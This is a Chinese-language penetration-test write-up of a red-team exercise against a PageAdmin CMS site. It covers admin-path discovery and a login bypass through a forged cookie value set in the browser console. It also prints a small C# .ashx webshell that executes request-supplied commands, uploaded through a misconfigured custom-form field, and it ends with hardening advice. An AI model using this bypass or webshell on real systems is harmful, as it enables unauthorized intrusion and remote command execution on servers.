从PageAdmin CMS后台到Shell：一次HW实战中的ASP.NET MVC应用渗透剖析

1. 从PageAdmin CMS后台到Shell的渗透实战上周参加红蓝对抗演练时遇到一个使用PageAdmin CMS的网站整个过程还挺有意思。这个基于ASP.NET MVC开发的CMS系统在中小企业中相当常见但很多管理员可能没意识到默认配置下它存在一些安全隐患。下面我就详细拆解下从发现后台到最终getshell的全过程希望能给做安全测试的朋友一些参考。PageAdmin CMS从2008年发布至今已经迭代到4.0版本特点是后台功能强大、操作体验友好。但正是这些强大的功能在某些配置不当的情况下可能成为攻击者的突破口。实战中我发现目标网站底部明确标注了Powered by PageAdmin这给了我们第一个线索。2. 信息收集与后台发现2.1 常规路径探测大多数CMS都有默认的后台路径PageAdmin也不例外。我首先尝试了常见的/admin、/manage等路径但都返回404。接着试了/master这个PageAdmin的默认后台路径依然不成功。看来管理员做了基本的防护修改了默认后台地址。这时候祭出御剑这类目录扫描工具就很有必要了。经过一番扫描最终在/console这个不起眼的路径下发现了后台登录页面。这里有个小技巧扫描时可以优先尝试包含admin、console、manager等关键词的路径这些是管理员修改后台地址时的常用选择。2.2 绕过登录验证找到后台后下一步就是尝试登录。先测试了几个常见弱口令组合admin/admin、admin/123456等不出所料都失败了。这时候乌云社区早年披露的一个漏洞就派上用场了 - 通过修改cookie可以直接绕过登录验证。具体操作是在浏览器控制台执行document.cookieMaster1LoginProcess1UserNameadminLOginDate1Valicate12b36e45c2df117d12a068814d826283f9c32f845e1589142208628b13fPermissions1;然后刷新页面就能直接进入后台。这个漏洞的原理是PageAdmin的登录状态验证存在缺陷攻击者可以通过伪造特定格式的cookie值来欺骗系统认为已经通过认证。虽然这是个老漏洞但在没有及时更新的系统中仍然可能有效。3. 受限后台中的突破口3.1 功能分析与利用点寻找进入后台后发现这是个阉割版 - 很多常规的功能模块都被移除了包括网上常见的通过专题管理getshell的方法。不过好在自定义表单功能还在这将成为我们的突破口。PageAdmin的自定义表单功能本意是让管理员可以灵活创建各种数据收集表单但它对上传文件的处理存在安全隐患。具体路径是后台 → 系统管理 → 自定义表单 → 添加新表单。3.2 文件上传漏洞利用创建一个新表单后进入字段管理添加字段。关键步骤是字段类型选择文件(file)在允许扩展名处输入.ashx系统默认可能只允许图片格式保存设置后该字段就允许上传.ashx文件了这里有个坑需要注意系统会检查上传文件内容是否包含page关键字如果包含就会拒绝上传。所以我们需要准备一个不包含这个关键词的.ashx格式的webshell。我使用的是简化版的cmd马核心代码如下% WebHandler LanguageC# ClassHandler % using System; using System.Web; public class Handler : IHttpHandler { public void ProcessRequest(HttpContext ctx) { ctx.Response.Write(System.Diagnostics.Process.Start( new System.Diagnostics.ProcessStartInfo( ctx.Request[cmd], /c ctx.Request[c])).StandardOutput.ReadToEnd()); } public bool IsReusable { get { return false; } } }这个马虽然功能简单但胜在体积小、不包含敏感关键词能够绕过内容检测。上传成功后通过访问对应的.ashx文件并传递cmd参数就能执行系统命令了。4. 安全加固建议4.1 针对管理员的建议经历过这次渗透后我总结了几点给使用PageAdmin CMS的管理员的建议及时更新到最新版本修复已知漏洞修改默认后台路径不要使用容易猜测的地址限制后台访问IP只允许特定网络环境访问禁用不必要的功能模块特别是文件上传类功能定期审计用户权限和系统日志4.2 针对开发者的建议对于使用ASP.NET MVC开发类似系统的开发者有几个安全要点需要注意所有用户输入都必须严格验证包括文件内容检查身份认证要使用标准的ASP.NET Identity等框架避免自己实现文件上传功能要限制扩展名并且将上传目录设置为不可执行敏感操作如命令执行要有完善的权限控制和日志记录这次实战中最有意思的部分就是在受限环境中寻找突破口的过程。虽然最终用的技术并不复杂但需要对系统功能有深入理解才能发现那个不起眼的自定义表单上传点。这也提醒我们安全防护不能只关注明显的风险点那些看似无害的功能配置不当同样可能成为入侵的跳板。